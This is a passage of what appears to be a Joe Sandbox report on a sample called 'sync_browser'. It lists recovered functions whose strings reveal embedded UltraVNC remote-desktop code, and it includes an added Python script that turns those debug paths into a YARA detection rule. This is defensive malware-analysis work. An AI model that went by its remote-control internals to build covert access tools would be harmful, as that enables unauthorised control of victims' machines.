• Opcode Fuzzy Hash: 1e6938374f11850d6f65cb4abe64859311d8d6483033998e6a50ab09662977c7
• Instruction Fuzzy Hash: A4514131A0868B82FB60BB71B9647B5A3A1AF44F84FC04437E54DC2658EE3CE505D762
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Thread$Object$CloseCreateCurrentDesktopEventHandleInformationResetSingleTerminateUserWait
                                                                      • String ID: Default$vncdesktopsink.cpp : ERROR: initwindowthread failed to start $vncdesktopsink.cpp : StartInitWindowthread $vncdesktopsink.cpp : StartInitWindowthread default desk$vncdesktopsink.cpp : StartInitWindowthread no default desk$vncdesktopsink.cpp : StartInitWindowthread reactivate$vncdesktopsink.cpp : StartInitWindowthread started
                                                                      • API String ID: 3943905059-2958163836
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DeleteIconInfoObject
                                                                      • String ID: vncencoderCursor.cpp : GetBitmapBits() failed.$vncencoderCursor.cpp : GetIconInfo() failed.$vncencoderCursor.cpp : GetObject() for bitmap failed.$vncencoderCursor.cpp : cursor bitmap handle is NULL.$vncencoderCursor.cpp : cursor handle is NULL.$vncencoderCursor.cpp : incorrect data in cursor bitmap.$vncencoderCursor.cpp : vncDesktop::GetRichCursorData() failed.
                                                                      • API String ID: 2689914137-3853778978
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Global$Lock$AllocFreemalloc
                                                                      • String ID: Unable to allocate memory in zip dll
                                                                      • API String ID: 105282483-1808592719
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Process$Token$ErrorInformationLastOpenWindow_errno$AllocAllocateCurrentEqualFindFreeHeapInitializeThread_callnewhmalloc
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 1145045407-2988720461
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseQueryValue$Openlstrlenmalloc
                                                                      • String ID: @$Enterprise$Personal$ProductSuite$SBS$Small Business$System\CurrentControlSet\Control\ProductOptions$Terminal Server
                                                                      • API String ID: 1137168859-3840687832
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _errno$FullNamePath__doserrno_getdrive_invalid_parameter_noinfo
                                                                      • String ID: .$:.
                                                                      • API String ID: 2522281643-2811378331
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Service$Status$Library$AddressCloseCreateCtrlEventFreeHandleHandlerLoadMetricsProcRegisterSystem
                                                                      • String ID: RegisterServiceCtrlHandlerExA$advapi32.dll$uvnc_service
                                                                      • API String ID: 333848887-3586523739
                                                                      APIs
                                                                      Strings
                                                                      • UltraVVNC running as application doesn't have permission to acces UAC protected windows.Screen is locked until the remote user unlock this window, xrefs: 00007FF7E50A0AAC
                                                                      • x, xrefs: 00007FF7E50A0A25
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Color$ObjectText$RectSelect$BitsBrushCreateDeleteDrawFillFlushSolid
                                                                      • String ID: UltraVVNC running as application doesn't have permission to acces UAC protected windows.Screen is locked until the remote user unlock this window$x
                                                                      • API String ID: 3190128964-2508378015
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateWindow$Thread$CombineCursorDeleteDesktopForegroundFromObjectPointRectTime_errno_invalid_parameter_noinfofreetime
                                                                      • String ID: schook$w8hook
                                                                      • API String ID: 2828954817-2864610768
APIs
Strings
• l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF7E5085FF6
• l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF7E5085FAF
• l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF7E5085F61
• l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF7E5085F1B
• l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF7E5085FC8
• l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF7E5086160
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
• Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
• String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
• API String ID: 181403729-1081969236
• Opcode ID: 53fb3c1bb1965282e4da31d922302c79b62d7af4abef1ccc30ce768ea4cf9713
• Instruction ID: b7d66a23cdfbadeab87edbd2f3ff6618abb8c3b35da3c8e3a3bc29138901096f
• Opcode Fuzzy Hash: 53fb3c1bb1965282e4da31d922302c79b62d7af4abef1ccc30ce768ea4cf9713
• Instruction Fuzzy Hash: D5612861A096C981E724BB25F4317F9B790EB54B04FC55037EA4DCB695EE3CD10AC722
APIs
Strings
• l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF7E508564A
• l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF7E5085603
• l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF7E50855BD
• l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF7E508557A
• l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF7E508561C
• l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF7E508577E
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
• Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
• String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
• API String ID: 181403729-1081969236
• Opcode ID: 53fd9ebbc342151809572dc5d5c454a9c87e4ee11642373697c9161ead6f8e27
• Instruction ID: 6a54c43896500749cb5cf8be16b5a7ad48e0a9a1e2f1a4adc99babe1cb083e9b
• Opcode Fuzzy Hash: 53fd9ebbc342151809572dc5d5c454a9c87e4ee11642373697c9161ead6f8e27
• Instruction Fuzzy Hash: 0B510762A195C995E725BB39B4707F8A390EB45B44FC4403BF94ECB695DE3CD10AC322
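Each record above gives, for one recovered function, its debug strings with their xref addresses, the memory dump it was lifted from, and the Similarity identifiers. The compiler source paths inside those strings (the part before " : ") are stable across builds of the same code base, which makes them better hunting indicators than any single log message. The parser below turns records in this text form into structured data and emits a YARA rule from those paths. It is an added editorial example, not part of the Joe Sandbox report and not UltraVNC code; SAMPLE is constructed from two of the records shown on this page (abridged to a few bullets), and the section and bullet grammar, the rule name and the escaping routine are this example's own assumptions about the rendered text, not a documented Joe Sandbox export format.

```python
"""Parse Joe Sandbox per-function records (Strings / Memory Dump Source /
Similarity) into structured data and build a YARA hunting rule from the
compiler debug paths they contain.

Added example; not part of the report or of UltraVNC. The text grammar
assumed here is what the rendered report shows, not an official format.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample: two consecutive function records copied (abridged) from
# the report. The second record has no xref'd strings, only a '$'-joined String ID.
SAMPLE = r"""
APIs
Strings
• l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF7E508564A
• l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF7E50855BD
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
• String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table
• API String ID: 181403729-1081969236
• Opcode ID: 53fd9ebbc342151809572dc5d5c454a9c87e4ee11642373697c9161ead6f8e27
• Instruction Fuzzy Hash: 0B510762A195C995E725BB39B4707F8A390EB45B44FC4403BF94ECB695DE3CD10AC322
APIs
Strings
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: _wgetenv$free$_errno_invalid_parameter_noinfoinet_ntoa
• String ID: !$CONNECT_DIRECT$HTTP_DIRECT$SOCKS4_DIRECT$SOCKS5_DIRECT$SOCKS_DIRECT
• API String ID: 1123868200-453874877
• Instruction Fuzzy Hash: 6F517125A0978A85EE11BB25E4603B9A790FF94F84F880037EA0D87795FF3CE445C762
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Yara matches", "Similarity"}
BULLET = "• "
# "<text>, xrefs: <addr>[, <addr>...]" as rendered under Strings
XREFS = re.compile(r"^(.*), xrefs: ([0-9A-Fa-f]+(?:, [0-9A-Fa-f]+)*)$")
# "<key>: <value>"; keys never contain ':' but values (source paths) do
KEYVAL = re.compile(r"^([^:]+):\s*(.*)$")


@dataclass
class FunctionRecord:
    strings: dict[str, list[str]] = field(default_factory=dict)  # text -> xrefs
    dump: dict[str, str] = field(default_factory=dict)           # Source File, Offset, ...
    similarity: dict[str, str] = field(default_factory=dict)     # API ID, String ID, ...


def parse_records(text: str) -> list[FunctionRecord]:
    """Split report text into records; every 'APIs' header opens a new one."""
    records: list[FunctionRecord] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":
                records.append(FunctionRecord())
            section = line
            continue
        # Non-bullet rows are table cells the extractor dropped; skip them.
        if not line.startswith(BULLET) or not records:
            continue
        body = line[len(BULLET):]
        rec = records[-1]
        if section == "Strings":
            m = XREFS.match(body)
            if m:
                rec.strings[m.group(1)] = m.group(2).split(", ")
        elif section == "Memory Dump Source":
            for part in body.split(", "):
                kv = KEYVAL.match(part)
                if kv:
                    rec.dump[kv.group(1)] = kv.group(2)
        elif section == "Similarity":
            kv = KEYVAL.match(body)
            if kv:
                rec.similarity[kv.group(1)] = kv.group(2)
    return records


def source_paths(records: list[FunctionRecord]) -> list[str]:
    """Drive-letter source paths (the text before ' : ') from xref'd strings and
    from '$'-joined String IDs. Plain tokens such as SOCKS5_DIRECT are left out."""
    paths = set()
    for rec in records:
        candidates = list(rec.strings)
        candidates += [s for s in rec.similarity.get("String ID", "").split("$") if s]
        for s in candidates:
            head, sep, _ = s.partition(" : ")
            if sep and re.match(r"^[a-z]:\\", head, re.I):
                paths.add(head)
    return sorted(paths)


def yara_escape(s: str) -> str:
    """YARA text strings use C-style escapes; backslash and quote must be escaped."""
    return s.replace("\\", "\\\\").replace('"', '\\"')


def to_yara(rule_name: str, strings: list[str], min_hits: int = 2) -> str:
    """Build a PE-scoped rule. The report renders paths in lower case, so match
    case-insensitively; min_hits is clamped so a one-string rule stays valid."""
    if not strings:
        raise ValueError("no strings to build a rule from")
    lines = [f"rule {rule_name}", "{", "    strings:"]
    for i, s in enumerate(strings):
        lines.append(f'        $s{i} = "{yara_escape(s)}" ascii wide nocase')
    n = min(min_hits, len(strings))
    lines += ["    condition:", f"        uint16(0) == 0x5A4D and {n} of ($s*)", "}"]
    return "\n".join(lines)


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(to_yara("ultravnc_winvnc_debug_paths", source_paths(recs)))
```

Run against the whole report text rather than SAMPLE to collect every source path the binary leaks (TextChat.cpp, vncservice.cpp and vncclient.cpp appear without a drive prefix in later records and are deliberately skipped by the drive-letter check). Review the generated rule before deploying it: the same paths are present in legitimate UltraVNC installs, so on their own they identify the code base, not malicious intent.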
APIs
Strings
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
• Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: _wgetenv$free$_errno_invalid_parameter_noinfoinet_ntoa
• String ID: !$CONNECT_DIRECT$HTTP_DIRECT$SOCKS4_DIRECT$SOCKS5_DIRECT$SOCKS_DIRECT
• API String ID: 1123868200-453874877
• Opcode ID: f4207ed447fdffa40201c704a00f463fe897cbc6349214418793c6f2e263591f
• Instruction ID: a8518619b6fff72471bc123f4aebbf3201f67a1ecad52829d2c9ad9b0bdf6ae8
• Opcode Fuzzy Hash: f4207ed447fdffa40201c704a00f463fe897cbc6349214418793c6f2e263591f
• Instruction Fuzzy Hash: 6F517125A0978A85EE11BB25E4603B9A790FF94F84F880037EA0D87795FF3CE445C762
APIs
Strings
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
• Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: Desktop$Thread$CloseCurrentDialogInformationInputObjectOpenParamUser
• String ID: TextChat.cpp : !GetUserObjectInformation $TextChat.cpp : OpenInputdesktop Error $TextChat.cpp : OpenInputdesktop OK$TextChat.cpp : SelectHDESK to %s (%x) from %x$TextChat.cpp : SelectHDESK:!SetThreadDesktop
• API String ID: 1907048692-1814171851
• Opcode ID: 8163326f654e9061bb90f399b61091b260bb383b6dd3451fd4e367f97eeb259b
• Instruction ID: 97d631a6bee099315ed845e96d8ab7bdd55de13b2d6b86ed22d3a37cd801dd0f
• Opcode Fuzzy Hash: 8163326f654e9061bb90f399b61091b260bb383b6dd3451fd4e367f97eeb259b
• Instruction Fuzzy Hash: A9310E21A08A8A91FA20EB25B8647F5A3A1FF88F45FC45037E94DC7658DF3CD505C762
APIs
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
• Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: CreateRect$DeleteObject$Combinefree$ErrorFreeHeapLast_errnomalloc
• String ID:
• API String ID: 1881577244-0
• Opcode ID: 7b57e6a86c69e11d924fc1659c6f441e4a7cff23a46561e18de1fdb13dff7902
• Instruction ID: 2b59919685589e4a1810c468926351cff5f703af9f7b38813825684cb1874c7b
• Opcode Fuzzy Hash: 7b57e6a86c69e11d924fc1659c6f441e4a7cff23a46561e18de1fdb13dff7902
• Instruction Fuzzy Hash: A1A1E672A0868A4ADB20AF25E464B7AB751FB84F88F905136EE0ED3755EF3CD404C721
APIs
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
• Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: Combine$DeleteObjectRectfree$Offset$Create
• String ID:
• API String ID: 2677898628-0
• Opcode ID: 3ee7ecd204df7dd3f615213fc9b16b46c74043faa91b9eb9bd615f088202f8d8
• Instruction ID: 73f6a3cb7e7f7e309ad646d1b4ae38ba1431db8f1e945804d28d6da134045023
• Opcode Fuzzy Hash: 3ee7ecd204df7dd3f615213fc9b16b46c74043faa91b9eb9bd615f088202f8d8
• Instruction Fuzzy Hash: 16418072B1491586FB10EB66E864AAD7330FB84F98B805132DF1E97B68DF38D445C310
APIs
Strings
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
• Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: CriticalSection$Leave$DesktopEnter$CloseInputInvalidateOpenRect
• String ID: W$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
• API String ID: 1769082246-4238595597
• Opcode ID: e970080873c8215d67751cf4df8fe2b5e593792b79e840585fb32c8e919cf0fc
• Instruction ID: 2575b596ab24926460b2a5bd81e157ee6b73d2b74f8b31c8113b3addb85a0992
